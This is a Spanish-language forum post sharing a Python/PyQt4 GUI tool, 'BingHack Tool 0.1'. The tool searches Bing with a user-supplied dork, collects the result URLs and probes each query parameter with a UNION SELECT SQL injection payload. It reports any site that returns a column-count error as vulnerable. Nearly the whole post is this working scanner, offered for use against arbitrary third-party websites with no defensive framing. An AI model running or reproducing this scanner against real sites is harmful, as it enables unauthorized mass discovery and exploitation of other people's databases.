• Fuentes

 #477285  por Doddy
 03 Sep 2015, 03:25
Un simple script para buscar en bing paginas vulnerables a SQLi.

Imagen

El codigo
#!usr/bin/python
#BingHack Tool 0.1
#Coded By Doddy H

import sys,urllib2,re
from PyQt4 import QtCore,QtGui

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def sql(webs):
 for web in webs :
  if re.findall("=",web): 
   web = re.split("=",web)
   web = web[0]+"="
   app.processEvents()
   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     new.console.appendPlainText("[SQLI] : "+web)
   except:
    pass

def limpiar(pag):

 limpia = []
 for p in pag:
  if p not in limpia:
   limpia.append(p)
 return limpia

def buscar(dork,count):

 pag = []
 s = 10  

 new.console.appendPlainText("[+] Searching pages ....")
 
 while s <= int(count):
  try:
   code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
   d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
   s += 10
   for a in d:
    pag.append(a)
  except:
   pass

 new.console.appendPlainText("[+] Cleaning ...")

 pag = limpiar(pag)
 return pag

def scan():

 new.console.clear()
 pages = buscar(new.dork.text(),new.pages.text())
 new.console.appendPlainText("[+] Scanning ...\n")
 sql(pages)
 new.console.appendPlainText("\n[+] Finished")

app = QtGui.QApplication(sys.argv)

new = QtGui.QWidget()

new.setWindowTitle("BingHack Tool 0.1 || Coded By Doddy H")
new.resize(450,470)
new.setStyleSheet("QWidget {background-color: #000000;color: #FF8000}")

new.label1 = QtGui.QLabel("Dork : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label1.setGeometry(30,23,80,20)

new.dork = QtGui.QLineEdit(new)
new.dork.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
new.dork.setGeometry(90,23,200,25)

new.label1 = QtGui.QLabel("Pages : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label1.setGeometry(30,60,80,20)

new.pages = QtGui.QLineEdit(new)
new.pages.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
new.pages.setGeometry(100,60,50,25)

new.search = QtGui.QPushButton("Scan",new)
new.search.setGeometry(305,22,110,28)
new.search.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")

new.label2 = QtGui.QLabel("Console",new)
new.label2.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label2.setGeometry(185,110,70,20)

new.console = QtGui.QPlainTextEdit(new)
new.console.setGeometry(50,150,350,300)
new.console.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")

new.connect(new.search,QtCore.SIGNAL("clicked()"),scan)

new.show()

sys.exit(app.exec_())

# The End ?